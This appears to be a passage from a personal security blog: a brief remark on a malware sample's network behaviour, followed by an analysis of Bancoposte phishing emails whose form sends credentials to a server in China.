Very interesting strings output.
The malware resolve and communicate first with: j.maxmind.com [126.96.36.199]
After this, the malware communicate via UDP with tons of other machines. Maybe other zombies client.
Often the spam folder of my gmail account is very interesting. I’m not a bancoposte customer, but I receive 2/3 email per week where someone notify me that my back account will be locked unless I provide my credentials in the attached form.
Of course, looking into the form, the post action result as the real danger.
All post data will be sent to an unknown server located in China.
Visiting the url (sending fake data) via post or get request, the page forward the client to poste.it with no referer.